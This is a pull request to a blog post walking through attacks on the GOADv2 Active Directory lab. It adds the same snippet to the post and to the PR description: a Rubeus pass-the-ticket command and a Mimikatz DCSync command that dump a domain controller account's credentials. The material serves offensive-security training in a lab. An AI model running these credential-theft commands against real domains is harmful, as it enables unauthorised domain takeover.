### PR TITLE
Update ptt with Rubeus section

### DIFF
--- a/_posts/2022-11-13-GOADv2-pwning-part10.md
+++ b/_posts/2022-11-13-GOADv2-pwning-part10.md
@@ -135,7 +135,15 @@ secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
 
 ![deleg_unconcstrained_secrets_dump.png](/assets/blog/GOAD/deleg_unconcstrained_secrets_dump.png)
 
-> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV
+> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz. Having a domain-joined machine should make this attack easier.
+
+```powershell
+.\Rubeus.exe ptt /ticket:doIFrzCCBaugAwIB......
+.\mimikatz.exe "lsadump::dcsync /domain:sevenkingdoms.local /user:kingslanding$" "exit"
+```
+
+![image](https://github.com/Mayfly277/mayfly277.github.io/assets/18597330/d1b83fd7-1c9e-4791-89a5-4489f287b9b2)
+
 
 > Unless you didn't notice, the unconstrained delegation abuse was here exploited to pass from the child to the parent domain ;) 
 {: .prompt-tip }


### PR DESCRIPTION
The current article states: 
> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV

From what I've seen, this is actually doable on a domain-joined machine as well and we do not have to run Rubeus on the Winterfell DC. 

```powershell
.\Rubeus.exe ptt /ticket:doIFrzCCBaugAwIB......
.\mimikatz.exe "lsadump::dcsync /domain:sevenkingdoms.local /user:kingslanding$" "exit"
```

![image](https://github.com/Mayfly277/mayfly277.github.io/assets/18597330/a09d2809-8ea4-426e-9d9b-bab12a37d9ac)
